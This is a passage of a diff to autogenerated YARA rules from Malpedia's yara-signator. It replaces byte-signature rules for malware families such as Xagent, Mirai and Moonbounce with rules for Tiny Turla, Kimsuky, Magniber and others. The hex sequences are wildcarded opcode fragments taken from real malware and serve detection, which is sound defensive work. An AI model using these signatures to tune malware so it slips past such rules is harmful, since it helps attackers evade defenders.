+		$sequence_13 = { 8b4c240c 898840200000 58 c20800 e9???????? }
+		$sequence_14 = { 50 56 ff15???????? 56 ff15???????? b001 }
+		$sequence_15 = { 59 59 c3 8b65e8 ff7588 ff15???????? 833d????????ff }
+		$sequence_16 = { ff15???????? 833d????????ff 750c ff742404 ff15???????? 59 c3 }
+		$sequence_17 = { ff15???????? 8bf0 83feff 7423 8b542410 }
+		$sequence_18 = { f2ae f7d1 2bf9 6810270000 }
+		$sequence_19 = { ff742410 ff742410 ff742410 e8???????? c21000 e8???????? 8a4c2404 }
+		$sequence_20 = { 8bf9 81e7ff000000 03f2 03f7 }
+		$sequence_21 = { b8447c0000 e8???????? 53 56 57 }
+		$sequence_22 = { 6a00 680030c800 6a00 6a00 68???????? }
+		$sequence_23 = { 8b542438 83c504 50 895500 }
+		$sequence_24 = { 8d442444 894d00 8b542438 83c504 }
+		$sequence_25 = { 6a00 6880000000 6800000400 8bce e8???????? }
+		$sequence_26 = { ffd6 8d44240c 6804010000 50 }
+		$sequence_27 = { 51 ff15???????? a1???????? b981000000 }
+		$sequence_28 = { 6a00 6a00 6a00 50 8bce e8???????? 6a00 }
+		$sequence_29 = { 85c0 750c ff15???????? 53 }
+		$sequence_30 = { 7403 50 ffd6 b912010000 }
+		$sequence_31 = { 56 57 b940000000 8d7c2411 88442410 f3ab }
+		$sequence_32 = { ff15???????? 50 ff15???????? 68d0070000 ff15???????? }
+		$sequence_33 = { 8d4c2410 6804010000 51 aa ff15???????? }
+		$sequence_34 = { 3bc3 57 740b 8b35???????? 50 ffd6 }
+		$sequence_35 = { ffd6 eb06 8b35???????? a1???????? 3bc3 7403 50 }
+		$sequence_36 = { 83c414 e8???????? 6a00 6a00 8d542414 }
+		$sequence_37 = { 6a00 8d542414 6a00 52 68???????? 6a00 }
+		$sequence_38 = { 68???????? 6801000080 ff15???????? 85c0 0f8599000000 53 56 }
+		$sequence_39 = { 33c0 8dbc245e020000 66899c245c020000 f3ab }
+		$sequence_40 = { 56 68ff0f1f00 ff15???????? 85c0 740a 56 }
+		$sequence_41 = { f3ab aa b9f9000000 33c0 }
+		$sequence_42 = { 5e 24fe 5b 40 81c408010000 c3 83c8ff }
+		$sequence_43 = { 83c41c 8d5c1850 83c520 41 81fb00200000 }
+		$sequence_44 = { 52 ff15???????? 85c0 8945dc }
+		$sequence_45 = { e9???????? c745e0a08b4100 e9???????? c745e0a88b4100 e9???????? }
+		$sequence_46 = { 8d8c24782c0000 50 51 e8???????? 83c41c 85c0 7443 }
+		$sequence_47 = { 8a443b28 88443328 46 88543b28 81fe80000000 7ccb 8b4dfc }
+		$sequence_48 = { 68???????? 50 c745c8f4010000 ff15???????? 8b4dec 8bf0 51 }
+		$sequence_49 = { 57 8d1c8584bf4100 33c0 f00fb10b 8b15???????? 83cfff 8bca }
+		$sequence_50 = { c785e4edffff0c000000 c785e8edffff00000000 c785ecedffff01000000 ff15???????? 8d8580edffff 50 ff15???????? }
+		$sequence_51 = { 50 8d8424ac010000 50 51 }
+		$sequence_52 = { 83e908 8d7608 660fd60f 8d7f08 8b048d144e4000 ffe0 f7c703000000 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 263168
 }
-rule MALPEDIA_Win_Xagent_Auto : FILE
+rule MALPEDIA_Win_Tiny_Turla_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "858895d8-2a97-5541-a089-3de82693028e"
+		id = "461da2a0-bc71-5807-a972-eaee61f0fc07"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xagent_auto.yar#L1-L243"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tiny_turla_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "6bd2f7e71d8c01d128cc02e9a985eec56e3c9b4bd52be45a95e998c8268d5099"
+		logic_hash = "3923b1794e00bdddc4d622e58d3337c930d14bfa9ca9a2022fc0085649294c88"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90697,48 +90816,32 @@ rule MALPEDIA_Win_Xagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1ea02 6bd20d b801000000 2bc2 }
-		$sequence_1 = { ff15???????? 8bd8 e8???????? 03d8 }
-		$sequence_2 = { 7702 2bc7 8b5204 8b0482 8b0488 8b4e10 85c9 }
-		$sequence_3 = { 33d2 eb02 8b11 8b4808 8bc1 57 8b7a08 }
-		$sequence_4 = { 8b7a08 c1e802 83e103 3bf8 7702 2bc7 8b5204 }
-		$sequence_5 = { 55 8bec 33c0 83ec0c 39412c }
-		$sequence_6 = { 7507 c7460c00000000 5f 5e 8be5 }
-		$sequence_7 = { e8???????? 8b4604 85c0 7407 8b4d08 8b11 8910 }
-		$sequence_8 = { ff15???????? 6a08 e8???????? 83c404 85c0 }
-		$sequence_9 = { 03ff 3b7e0c 7707 c7460c00000000 49 894e10 7507 }
-		$sequence_10 = { 7509 488b03 488bcb ff5008 488b7d8f 4883c610 488d46f8 }
-		$sequence_11 = { e8???????? 48833b00 740a 488b4308 }
-		$sequence_12 = { 4883ec30 4883792800 498bf9 498bf0 }
-		$sequence_13 = { 740c 488b07 4c8b13 488903 4c8917 488b13 488b0e }
-		$sequence_14 = { e8???????? 488b4328 4c8bcf 4c8bc6 }
-		$sequence_15 = { 0f92c3 488d4c2430 e8???????? 90 }
-		$sequence_16 = { e8???????? 90 0fb705???????? 6689442420 }
-		$sequence_17 = { 740c 488b07 488b0b 488903 48890f 488b5c2430 488b6c2438 }
-		$sequence_18 = { b803b57ea5 f7e6 c1ea06 6bd263 }
-		$sequence_19 = { 75f8 488d8c2430010000 482bc1 488d8c0430010000 }
-		$sequence_20 = { 75f8 488bf9 482bfe 2bfb }
-		$sequence_21 = { 75f8 488bf9 482bfb 448bcf }
-		$sequence_22 = { 75f8 488d4c2420 482bc1 488d4c0420 }
-		$sequence_23 = { 75f8 488bf9 482bfa 4c8bc7 }
-		$sequence_24 = { 75f8 488bf8 482bfa 488b4b28 }
-		$sequence_25 = { 75f8 492bc3 488bcf 6645892c03 }
+		$sequence_0 = { c705????????04000000 488bc8 ff15???????? 85c0 742c 488bcb }
+		$sequence_1 = { 85c0 742c 488bcb e8???????? 488b0d???????? }
+		$sequence_2 = { 4883ec20 488b1a 488d15e0ffffff 488bcb }
+		$sequence_3 = { c705????????01000000 4883c420 5b 48ff25???????? }
+		$sequence_4 = { 4883ec20 488b1a 488d15e0ffffff 488bcb ff15???????? 488905???????? 4885c0 }
+		$sequence_5 = { 488bcb ff15???????? 488905???????? 4885c0 744a }
+		$sequence_6 = { c705????????01000000 4883c420 5b 48ff25???????? 4883c420 }
+		$sequence_7 = { 488d15e0ffffff 488bcb ff15???????? 488905???????? 4885c0 }
+		$sequence_8 = { ff15???????? 85c0 742c 488bcb e8???????? 488b0d???????? }
+		$sequence_9 = { ff15???????? 85c0 742c 488bcb e8???????? }
 
 	condition:
-		7 of them and filesize < 729088
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Elf_Mirai_Auto : FILE
+rule MALPEDIA_Win_Beatdrop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a94410d-6aba-512a-9a6d-b6363b222e3b"
+		id = "7fbd33c7-5e5a-5775-9e75-19a0333e1225"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.mirai_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beatdrop_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "95cccaf1db437d04c6a57d106a32e35fecc8afe8a0ffd0ae0c2e8cb3aa402bb4"
+		logic_hash = "b158347b6f43a3a62739d069377789597416764bca18afcdaffdbcf2df1f7202"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90752,34 +90855,34 @@ rule MALPEDIA_Elf_Mirai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66894104 7406 66c741064000 c6410911 }
-		$sequence_1 = { c1ea03 89d0 c1e005 01d0 89ca 29c2 }
-		$sequence_2 = { 66c1e808 d0e8 8d04c0 28c2 }
-		$sequence_3 = { e9???????? e8???????? 66894304 e9???????? }
-		$sequence_4 = { 6689432a e8???????? c7433400000000 894330 c6433801 c6433903 c6433a03 }
-		$sequence_5 = { 8b1408 895310 8b54080c 66895314 }
-		$sequence_6 = { 89d0 c1e005 01d0 89ca }
-		$sequence_7 = { 3c19 7705 8d42e0 8801 }
-		$sequence_8 = { c1e005 01d0 89ca 29c2 }
-		$sequence_9 = { e9???????? e8???????? 66894314 e9???????? }
+		$sequence_0 = { 47339c8d000c0000 413384bd00080000 4133948d00080000 44335d60 0fb6d8 0fb6cc 4189d1 }
+		$sequence_1 = { 33557c 413384bd000c0000 4489cf 334578 41c1eb18 }
+		$sequence_2 = { 443385a4000000 450fb6d2 4733849500040000 450fb6d7 }
+		$sequence_3 = { 4c3b6610 740f 4c89e1 e8???????? }
+		$sequence_4 = { 4409c8 4133470c 448b7c2418 89aef8000000 }
+		$sequence_5 = { 47338495000c0000 4189c2 0fb6cd 41c1ea10 443385a4000000 450fb6d2 4733849500040000 }
+		$sequence_6 = { c1ea10 338590000000 458b74b500 4489c1 0fb6d2 }
+		$sequence_7 = { 41c1ef18 0fb6cd 44897c2418 894c2404 89c1 0fb6c0 c1e918 }
+		$sequence_8 = { c1e818 4489d1 450fb6da 418b448500 41338495000c0000 }
+		$sequence_9 = { 4133948c00080000 89c1 0fb6ef 440fb6c2 }
 
 	condition:
-		7 of them and filesize < 2228224
+		7 of them and filesize < 584704
 }
-rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE
+rule MALPEDIA_Win_Kimsuky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f032b4ba-8128-5978-8559-debc3caa42cc"
+		id = "2b35147a-6567-5a82-9763-3c4ee63e8bd0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.multigrain_pos_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kimsuky_auto.yar#L1-L287"
 		license_url = "N/A"
-		logic_hash = "57d310c472fb68cb78caa9b432b3db45871bc6e9132f2a98edf83ac773bc72f9"
+		logic_hash = "8be5626e2aa4b8842ccf79ecee20f7ed9aeff1f3bf60d56bf491e7076e9910d9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90791,32 +90894,53 @@ rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 68???????? eb25 807dec00 7504 33c9 }
-		$sequence_1 = { 8b13 50 8d8d6cffffff e8???????? 83ec18 }
-		$sequence_2 = { 66894508 720b ff7520 e8???????? 83c404 8ac3 }
-		$sequence_3 = { c746140f000000 c7461000000000 68???????? 8bce c745fc00000000 }
-		$sequence_4 = { c7411000000000 50 c60100 e8???????? 8d8da4feffff }
-		$sequence_5 = { 83f908 720d 8b0e 50 8d145a e8???????? eb2c }
-		$sequence_6 = { e8???????? 68???????? 8bd0 8d4dd8 c645fc03 e8???????? }
-		$sequence_7 = { 1bc0 f7d8 5e 5d c20800 85f6 750f }
-		$sequence_8 = { 50 888534ffffff 8d8535ffffff 50 e8???????? 83c40c }
-		$sequence_9 = { 837d1c10 8bd8 8d4508 0f434508 56 }
+		$sequence_0 = { 8d85f8feffff 6804010000 50 e8???????? 8d85f0fcffff }
+		$sequence_1 = { ffd7 a3???????? 8d85ecfbffff 50 53 ffd7 }
+		$sequence_2 = { 6a00 6800f70484 6a00 6a00 68???????? 8d85e4fbffff 50 }
+		$sequence_3 = { ff15???????? 3db7000000 7503 56 eb18 6a00 }
+		$sequence_4 = { 8d95f0fcffff b9???????? e8???????? 8d95ecfbffff b9???????? }
+		$sequence_5 = { ff15???????? 8d85ecfbffff 50 8d85f8feffff 50 8d85f4fdffff 68???????? }
+		$sequence_6 = { e8???????? 83c418 8d85f8feffff 6a00 50 ff15???????? 8d85ecfbffff }
+		$sequence_7 = { ff15???????? 85c0 7516 ff15???????? 8bd8 e8???????? }
+		$sequence_8 = { ffd7 a3???????? 8d85d4f5ffff 50 }
+		$sequence_9 = { 8b4520 4883c514 85c0 0f857affffff 4c8b7c2460 4c8b6c2420 4c8b642428 }
+		$sequence_10 = { 4156 4157 4883ec40 48896c2470 }
+		$sequence_11 = { 48896c2460 488b4818 41bb01000000 4c8b7120 4d85f6 }
+		$sequence_12 = { 33d2 4883c9ff 4903de ff542468 4533c0 498bce }
+		$sequence_13 = { 488b6c2460 4c637d3c 33c9 41b800300000 4c03fd 448d4940 }
+		$sequence_14 = { 48896c2470 4889742438 4533ff 4c89642428 4c896c2420 33f6 }
+		$sequence_15 = { 7405 48ffcd ebdb 65488b042560000000 48897c2430 48896c2460 }
+		$sequence_16 = { 85c9 0f8494020000 89bda0000000 897d30 }
+		$sequence_17 = { 89442450 8bf0 8bc8 e8???????? }
+		$sequence_18 = { 85c0 0f84b3000000 85f6 0f8497000000 }
+		$sequence_19 = { 85c0 0f84e6000000 c6850801000000 33c0 }
+		$sequence_20 = { 4c89642430 c744242880000000 c744242002000000 4533c9 4533c0 ba00000040 }
+		$sequence_21 = { 8bcf 85c0 0f94c1 85c9 }
+		$sequence_22 = { 488d8a38000000 e9???????? 488d8a28010000 e9???????? }
+		$sequence_23 = { 895c2458 eb04 8b5c2458 c685700d000000 33d2 }
+		$sequence_24 = { 8bd7 3bd8 0f94c2 85d2 7419 }
+		$sequence_25 = { 488d95003e0000 488bc8 e8???????? 90 }
+		$sequence_26 = { 488d9510010000 488d4dc0 e8???????? 90 }
+		$sequence_27 = { 488d9510010000 498bce ff15???????? 498bce }
+		$sequence_28 = { 488d9500010000 4883bd1801000008 480f439500010000 4c8d05c2850500 }
+		$sequence_29 = { 488d9424c0000000 4883bc24d800000008 480f439424c0000000 48895c2438 c744243000f70484 48895c2428 }
+		$sequence_30 = { 488d9508010000 488d4c2440 e8???????? 90 488b542458 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 1021952
 }
-rule MALPEDIA_Win_Lazardoor_Auto : FILE
+rule MALPEDIA_Win_Sedll_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aeee5fb7-3124-5412-93e2-d397e0b6b5aa"
+		id = "c98327c8-f977-5098-aace-6f65383d00ba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lazardoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sedll_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "6155f61e925d37cd5ef1d71aad2d5b29beaeb971eaf97c299374ef05d14474a1"
+		logic_hash = "df74daada1e394daccd88b8caf7c67ee5c703bfd5e5886cc476e5ba06e59b034"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90830,34 +90954,34 @@ rule MALPEDIA_Win_Lazardoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883c024 8938 e8???????? 488d1d23ce0100 }
-		$sequence_1 = { e8???????? ba50540000 488b0d???????? 4533c9 4533c0 ff15???????? }
-		$sequence_2 = { 4803cf e8???????? 488b0e 41ffc6 4883c328 }
-		$sequence_3 = { 4889442420 498bd4 ff15???????? 85c0 7506 ff15???????? 4533f6 }
-		$sequence_4 = { 4c8bb424d0010000 488b8dc0000000 4833cc e8???????? 4881c4e8010000 415f 415d }
-		$sequence_5 = { 488d45e8 48894de8 488945f0 488d155cde0000 }
-		$sequence_6 = { 83c8ff f00fc103 83f801 7516 488d05a6470100 488b4c2430 483bc8 }
-		$sequence_7 = { 7873 3b1d???????? 736b 488bc3 488bf3 48c1fe06 4c8d2dbe0f0100 }
-		$sequence_8 = { 488d1517c4feff c1e803 89442450 8bc8 89442448 }
-		$sequence_9 = { 488d15c2a20200 488bce ff15???????? 85c0 0f84f3000000 48c7c7ffffffff 488bc7 }
+		$sequence_0 = { ff75fc f30f7f45dc 6a00 6a00 6a00 }
+		$sequence_1 = { 741e 8bd3 8d4a01 8d642400 8a02 }
+		$sequence_2 = { 5e 8908 33c0 5d c20c00 8b4510 33c9 }
+		$sequence_3 = { 8d55f8 52 c745f800000000 68???????? 8b08 50 ff11 }
+		$sequence_4 = { 7412 f30f6f05???????? 8b4520 f30f7f00 830e04 f6c101 7426 }
+		$sequence_5 = { 83c604 83ef04 73ef 8b4d08 8b4510 51 8908 }
+		$sequence_6 = { 8bf0 83c404 8975e8 85f6 7507 5f }
+		$sequence_7 = { 7c7e 8d9b00000000 0fb60f 83c604 c1e902 }
+		$sequence_8 = { 50 8b4508 03c6 50 53 ff15???????? 85c0 }
+		$sequence_9 = { 884e01 885602 83c603 33c9 47 3bfb }
 
 	condition:
-		7 of them and filesize < 405504
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Maggie_Auto : FILE
+rule MALPEDIA_Win_Artra_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81084c1b-a8b2-52e1-b50c-8b61dc38259b"
+		id = "5ecf739d-5644-589e-9019-73f6778eda0f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maggie_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.artra_auto.yar#L1-L273"
 		license_url = "N/A"
-		logic_hash = "c0bf28bd0446ea04e23665ed8ce11b5b78fa1a4a971a7efa9966e49954f77131"
+		logic_hash = "47a80b3adb8b5b5a6473fc70d14da7afeb3a861c9b53c6c23d484145a04e805d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90869,32 +90993,48 @@ rule MALPEDIA_Win_Maggie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? e8???????? 84c0 74ec e8???????? }
-		$sequence_1 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 }
-		$sequence_2 = { 663b05???????? 7505 e8???????? e8???????? }
-		$sequence_3 = { 7511 ff15???????? 85c0 7407 33c0 e9???????? }
-		$sequence_4 = { b8ff000000 663b05???????? 7505 e8???????? }
-		$sequence_5 = { 750f ff15???????? 2d33270000 f7d8 }
-		$sequence_6 = { 750f ff15???????? 2d33270000 f7d8 1bc0 }
-		$sequence_7 = { 663b05???????? 7505 e8???????? e8???????? 84c0 }
-		$sequence_8 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 }
-		$sequence_9 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 }
+		$sequence_0 = { 75cc 5d 5b 8b442410 5f 5e 83c41c }
+		$sequence_1 = { 5f 8a08 40 84c9 75f9 2bc2 880c30 }
+		$sequence_2 = { 5f 5e 83c41c c21000 5f 33c0 }
+		$sequence_3 = { 57 33c9 8d7801 8da42400000000 8a10 40 84d2 }
+		$sequence_4 = { 2bc7 3bc8 72e3 8bc6 8d5001 5f }
+		$sequence_5 = { 800431f3 8bc6 41 8d7801 8d9b00000000 }
+		$sequence_6 = { e8???????? 8b3d???????? 6a00 6a00 6a00 8d442414 }
+		$sequence_7 = { ff15???????? 8bf8 85ff 0f8488000000 6a00 57 ff15???????? }
+		$sequence_8 = { 8d8c2420010000 51 8d542418 52 8d442420 50 }
+		$sequence_9 = { 2bc2 03fb 8a4f01 47 }
+		$sequence_10 = { 40 42 84c9 75f6 e8???????? }
+		$sequence_11 = { 8bf0 8bd1 83c404 2bf2 90 8a11 88140e }
+		$sequence_12 = { 90 8b542410 8d4c2410 51 56 52 ffd3 }
+		$sequence_13 = { 53 8b1d???????? 55 8b2d???????? 90 }
+		$sequence_14 = { e8???????? 8d442458 83c410 8bc8 }
+		$sequence_15 = { 6a00 8d54241c 52 ffd7 85c0 75cc 5d }
+		$sequence_16 = { 6a00 8d442414 50 ffd7 85c0 7445 }
+		$sequence_17 = { 7205 e8???????? 8b7c2414 8b4f3c 8b11 8b5214 8d44241c }
+		$sequence_18 = { 2c61 3c05 7733 885c2c18 45 83fd02 7529 }
+		$sequence_19 = { 8810 40 83ee01 75f3 b8???????? c6042f00 8d5001 }
+		$sequence_20 = { c1f805 8bcf 83e11f c1e106 8b0485e03b4100 c644080401 57 }
+		$sequence_21 = { c21000 a1???????? 6a00 68???????? 56 6a67 50 }
+		$sequence_22 = { 6a6d 56 ff15???????? be???????? 8bf8 e8???????? }
+		$sequence_23 = { c744241430124000 c744241800000000 c744241c00000000 89442420 ffd6 68007f0000 6a00 }
+		$sequence_24 = { 8b2d???????? 8b442410 8d542410 52 57 50 ffd3 }
+		$sequence_25 = { 8b542428 50 68???????? 6a01 }
 
 	condition:
-		7 of them and filesize < 611328
+		7 of them and filesize < 811008
 }
-rule MALPEDIA_Win_Moonbounce_Auto : FILE
+rule MALPEDIA_Win_Magniber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "300bd16a-9128-501e-b6a9-aa7b7927b326"
+		id = "2010ff15-6b80-529a-a5cd-f6820259a96c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moonbounce_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.magniber_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "07326c1e5d89427ce612fcc5180ad0922ace80e6e89b51e53f272b71223e0de4"
+		logic_hash = "40cc2b100a2166758d1bade12df1107c6219e6f30fc93c01403c3eb3fe63bfd1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90908,32 +91048,38 @@ rule MALPEDIA_Win_Moonbounce_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4dd4 0500100000 83c418 8901 }
-		$sequence_1 = { b9???????? 2bc8 51 50 8b4508 83c014 50 }
-		$sequence_2 = { 8945d8 53 8d45dc 50 ff15???????? 8d45d0 8945f8 }
-		$sequence_3 = { 034004 83780400 7798 8d8680000000 83780400 }
-		$sequence_4 = { 57 57 83c60c 56 ff15???????? 5f }
-		$sequence_5 = { ff7508 ff15???????? 6a40 6800300000 8d45fc 50 }
-		$sequence_6 = { 84c0 7518 8b4310 56 }
-		$sequence_7 = { 8365f400 8d5008 895508 8b5004 03cb 83c2f8 894df0 }
-		$sequence_8 = { 8b45f0 0fb70448 8b4f1c 8d0c81 8b4508 8b1c01 03d8 }
-		$sequence_9 = { 8d450c 50 ff750c 33db ff15???????? }
+		$sequence_0 = { c78514fdffff38994000 c78518fdffff40994000 c7851cfdffff48994000 c78520fdffff54994000 c78524fdffff60994000 c78528fdffff68994000 }
+		$sequence_1 = { 83c404 8945fc 837dfc00 0f84d7000000 68???????? 8b45fc }
+		$sequence_2 = { 8b45f8 8b8c8548ffffff 51 8b55f0 52 }
+		$sequence_3 = { 0f8462010000 8b55ec 52 ff15???????? 83f801 }
+		$sequence_4 = { c785fcfcffff08994000 c78500fdffff10994000 c78504fdffff18994000 c78508fdffff20994000 c7850cfdffff28994000 c78510fdffff30994000 }
+		$sequence_5 = { 7505 e9???????? 8b4df8 3b4df0 7307 }
+		$sequence_6 = { 6a00 6a03 6800000080 8b4d10 51 }
+		$sequence_7 = { 55 8bec 51 8b4508 83b86804000000 741b 8b4d08 }
+		$sequence_8 = { d331 4e4e54 70ac 52 f8 a6 }
+		$sequence_9 = { 097934 50 5e 5a 3558e9e633 }
+		$sequence_10 = { bb72657959 a1????????ba30f7a3 873428 de9d164df944 ee aa }
+		$sequence_11 = { 7f4c c82cd1c6 1a32 b636 }
+		$sequence_12 = { 21746c2e 4834b0 184026 e221 a1????????05eef081 e0f8 }
+		$sequence_13 = { 4baa 055457541d e9???????? bc12819787 bbdd81d473 ba2326dc05 645f }
+		$sequence_14 = { 32cb 5a b3b1 3e6c 21746c2e 4834b0 184026 }
+		$sequence_15 = { 283d98b7a0e5 7f9b 0b733e fd 6acb 199335632362 }
 
 	condition:
-		7 of them and filesize < 70912
+		7 of them and filesize < 117760
 }
-rule MALPEDIA_Win_Atmii_Auto : FILE
+rule MALPEDIA_Win_Unidentified_118_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bbbbf02-dbb5-50f9-89bd-68bafb7f61b1"
+		id = "4400b473-0fbc-528a-90a2-ec9f1b80742d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmii_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_118"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_118_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "de7adb20577b33d8a8506758d2e0ffbda74b46bc9a6446d600c84a3c6b3b34c4"
+		logic_hash = "d467c02dd84dc6cead16168800c63f7f296242b2a484c5237404056a67dd88cf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90947,38 +91093,32 @@ rule MALPEDIA_Win_Atmii_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6c302 740a 83481804 8a0a 884810 }
-		$sequence_1 = { eb60 68???????? eb55 68???????? 8d55ac 52 }
-		$sequence_2 = { 56 c745f800000000 ff15???????? 85c0 0f94c0 8845ff }
-		$sequence_3 = { 8d95dcfbffff 52 e8???????? 83c418 6a00 }
-		$sequence_4 = { 50 ffd3 8a5510 8985cdf9ffff 8b450c 50 }
-		$sequence_5 = { 750a 8b4dfc 8b5109 ffd2 eb02 33c0 }
-		$sequence_6 = { 8b55fc 0355f4 8a02 8801 ebdd 8be5 }
-		$sequence_7 = { 8d95fcf3ffff 52 e8???????? 83c42c }
-		$sequence_8 = { 8d45b8 50 68???????? 68b6000000 8d8df8fcffff 68???????? 51 }
-		$sequence_9 = { 6a00 6a02 ff15???????? 8bf8 897dfc 83ffff 0f8456010000 }
-		$sequence_10 = { 8985c5f9ffff ffd7 50 ffd3 }
-		$sequence_11 = { 0f8419040000 53 57 6814020000 }
-		$sequence_12 = { 83c414 68???????? 50 68???????? 68???????? ffd7 8b4e10 }
-		$sequence_13 = { 8d45cc 50 eb14 68???????? 8d4dcc }
-		$sequence_14 = { 6a00 ff15???????? 50 ff15???????? 68???????? 68d5000000 }
-		$sequence_15 = { 8a8dfcfeffff 8a95fefeffff 8a8500ffffff 57 }
+		$sequence_0 = { 0f57c0 c60300 41b820000000 0f1101 4883611000 488bd6 4883611800 }
+		$sequence_1 = { e8???????? 84c0 7409 488933 c6430800 eb79 48b8e1e1e1e1e1e1e101 }
+		$sequence_2 = { 84c0 740c 817c243000400000 7502 }
+		$sequence_3 = { 488bc3 488b4d07 4833cc e8???????? 4881c4b8000000 415f 415e }
+		$sequence_4 = { 488b49f8 482bc1 4883c0f8 4883f81f 7721 e8???????? 8bc3 }
